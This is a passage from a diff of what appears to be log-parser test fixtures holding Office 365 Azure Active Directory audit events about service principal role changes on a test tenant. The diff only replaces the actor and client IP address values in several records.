APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3359,9 +3359,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -3595,7 +3595,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3625,9 +3625,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -3861,7 +3861,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 